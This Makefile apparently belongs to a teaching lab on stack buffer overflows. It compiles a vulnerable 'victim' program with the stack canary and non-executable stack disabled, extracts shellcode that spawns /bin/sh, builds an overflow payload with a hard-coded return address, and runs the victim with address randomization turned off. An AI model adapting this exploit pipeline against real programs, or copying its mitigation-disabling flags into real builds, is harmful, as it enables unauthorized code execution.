# This is an attempt to automate the construction of an attack against
# the victim program that executes a shellcode to open /bin/sh.
#
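# The scripts try to obtain all parameters, but you need to set the
# memory location of the buffer on the stack below (the victim prints
# it to stderr for convenience).
#
# That address is only reproducible because the demo switches the usual
# mitigations off: the victim is built without a stack protector and
# with an executable stack, and 'make attack' runs it with address-space
# randomization disabled.
#
# If the 'make attack' target succeeds, you end up in a non-interactive
# shell; try typing shell commands to see that you actually are in a
# shell.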

# Stack address of the victim's buffer, copied from what ./victim prints
# on stderr.  Machine-specific: re-read it before building attack.bin.
BUFFER := 0x7fffffffe390

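# Default goal: build the lab binaries and the payload file.  Running the
# victim is left to the separate 'attack' target.
# Declared phony so a stray file named 'all' cannot mask the goal.
.PHONY: all
all: victim shellcode shellcode.hex attack.bin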

# Lab build of the vulnerable program.  The two extra flags turn off
# mitigations for this binary:
#   -fno-stack-protector  no stack canary is emitted
#   -z execstack          the stack is marked executable (NX off)
victim: victim.c
	gcc -fno-stack-protector -z execstack -o $@ $<

# Helper binary; the shellcode.hex rule reads its machine code with
# objdump and xxd.
shellcode: shellcode.c
	gcc -o $@ $<

# Dump the bytes between the needle0 and needle1 markers of ./shellcode as
# plain hex.  The marker addresses come from the objdump listing; the
# length is rounded up to the next power of two with bc before xxd reads
# that many bytes.  Needs an awk that accepts -e (a gawk option, not POSIX).
shellcode.hex: shellcode
	start=0x$$(objdump -d $< | awk -e '/needle0/ { print $$1 }'); \
	end=0x$$(objdump -d $< | awk -e '/needle1/ { print $$1 }'); \
	size=$$(($$end-$$start)); \
	size=$$(echo "a = 1; while (a < $$size) { a *= 2; }; a" | bc); \
	xxd -s $$start -l $$size -p $< $@

# Assemble the input file for ./victim from three hex pieces and convert
# it to binary with xxd -r -p:
#   1. the contents of shellcode.hex
#   2. 80 '0' digits, i.e. 40 zero bytes of filler
#   3. BUFFER as 16 hex digits with the byte pairs reversed (little-endian)
# The filler length is presumably tied to victim.c's stack layout, which is
# not visible in this file.  Makefile is listed as a prerequisite, so an
# edit to BUFFER causes a rebuild.
attack.bin: shellcode.hex Makefile
	addr=$$(printf %016x $(BUFFER) | tac -rs..); \
	{ cat $<; printf %080d 0; echo $$addr; } | xxd -r -p > $@

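# Feed the payload to the victim, then keep forwarding the terminal's
# stdin ('-') so typed commands reach whatever the victim is running.
# setarch -R disables address-space randomization for this one process,
# which is what keeps the hard-coded BUFFER address valid.
# Declared phony: this is a command, not a file to be produced.
.PHONY: attack
attack: victim attack.bin
	cat attack.bin - | setarch $$(arch) -R ./victim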

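# Remove every file the rules in this Makefile generate.  shellcode.hex is
# included so a stale payload fragment cannot survive into the next build.
# Declared phony so a file named 'clean' cannot disable the target.
.PHONY: clean
clean:
	rm -f victim shellcode shellcode.hex attack.bin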
